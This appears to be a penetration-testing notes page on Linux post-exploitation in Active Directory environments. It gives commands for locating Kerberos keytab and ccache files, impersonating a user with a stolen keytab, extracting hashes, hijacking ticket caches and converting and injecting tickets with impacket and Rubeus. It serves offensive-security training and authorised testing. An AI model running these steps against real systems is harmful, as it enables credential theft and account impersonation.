Linux Post-Exploitation
The only difference from Post-Exploitation in #Pentesting is that here we would use only AD-related PE vectors which is executed in Linux OS.
Linux computers can connect to Active Directory, though it's a Microsoft technology. Also it's not required for Linux machine to be connected to AD to use Kerberos tickets.
Checking Linux and AD relations
realm
realm listPS
ps -ef | grep -i "winbind\|sssd"Finding Kerberos Tickets
Finding tickets is very important part of Active Directory exploitation and post-exploitation. For a beginning, tickets in Linux are usually located here:
keytab files - commonly allow scripts to authenticate automatically using Kerberos without human interaction or access to a password stored in a plain text file
ccache files - credential cache is stored in /tmp directory
KRB5CCNAME- environment variable
Crontab
crontab -lKeytab Files
find / -name *keytab* -ls 2>/dev/nullCcache
env | grep -i krb5
ls -la /tmpAbusing Keytab
Impersonate user
klist -k -t #list keytab file info
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab #impersonation carni7 using his keytabKeyTabExtract
[LINK] This is tool which is extracting Kerberos hashes from keytab file.
python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab Abusing ccache
For using ccache files you need to have root privileges
Checking group privileges
id rio@amogus.kekNow after locating right non-expired Kerberos ticket, we could import ccache file into our session by changing value of KRB5CCNAME env and checking tickets with klist.
cp /tmp/krb5cc_768304578_BRB541 .
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
Ticket cache: FILE:/root/krb5cc_768304578_BRB541If the result is the same, we could be sure that now Kerberos is using our ticket.
Ticket Converter
impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbiImporting Kerberos Ticket
C:\Rubeus.exe ptt /ticket:c:\carni7.kirbiLast updated